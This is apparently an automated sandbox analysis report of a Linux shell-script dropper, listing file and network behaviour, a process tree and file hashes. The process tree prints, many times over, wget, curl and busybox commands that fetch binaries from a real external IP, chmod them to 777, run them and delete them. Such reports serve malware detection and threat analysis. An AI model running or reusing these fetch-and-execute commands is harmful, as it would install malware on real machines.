| N/A | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | N/A |
| N/A | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | N/A |
| N/A | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | N/A |
| N/A | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | N/A |
| N/A | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | N/A |
| N/A | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | N/A |
| N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | N/A |
| N/A | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | N/A |
| N/A | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | N/A |
| N/A | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /usr/bin/curl | N/A |
Processes
/tmp/d0aa4d8333f14e2cdeb6fd6a944d6ae7e035a12f91eda5f2f2e9c7a47e176165.sh
[/tmp/d0aa4d8333f14e2cdeb6fd6a944d6ae7e035a12f91eda5f2f2e9c7a47e176165.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/chmod
[chmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
[./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/rm
[rm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/wget
[wget http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/chmod
[chmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h
[./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/rm
[rm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/wget
[wget http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/chmod
[chmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae
[./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/rm
[rm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/wget
[wget http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/chmod
[chmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd
[./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/rm
[rm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/wget
[wget http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/chmod
[chmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20
[./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/rm
[rm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/wget
[wget http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/chmod
[chmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i
[./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/rm
[rm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/wget
[wget http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/chmod
[chmod 777 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u
[./llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/rm
[rm llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/wget
[wget http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/chmod
[chmod 777 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv
[./5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/rm
[rm 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/wget
[wget http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/chmod
[chmod 777 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd
[./TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/rm
[rm TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/wget
[wget http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/chmod
[chmod 777 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo
[./lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/rm
[rm lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/wget
[wget http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/chmod
[chmod 777 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj
[./TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/rm
[rm TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/wget
[wget http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/chmod
[chmod 777 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC
[./ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/rm
[rm ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/wget
[wget http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/chmod
[chmod 777 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH
[./0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/rm
[rm 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/wget
[wget http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/chmod
[chmod 777 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6
[./cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/rm
[rm cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/usr/bin/wget
[wget http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/chmod
[chmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
[./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/rm
[rm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/wget
[wget http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/chmod
[chmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h
[./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/rm
[rm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/wget
[wget http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/chmod
[chmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae
[./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/rm
[rm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/wget
[wget http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/chmod
[chmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd
[./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/rm
[rm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/wget
[wget http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/chmod
[chmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20
[./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/rm
[rm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/wget
[wget http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/chmod
[chmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i
[./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/rm
[rm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/wget
[wget http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
Network
| Country | Destination | Domain | Proto |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
Files
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |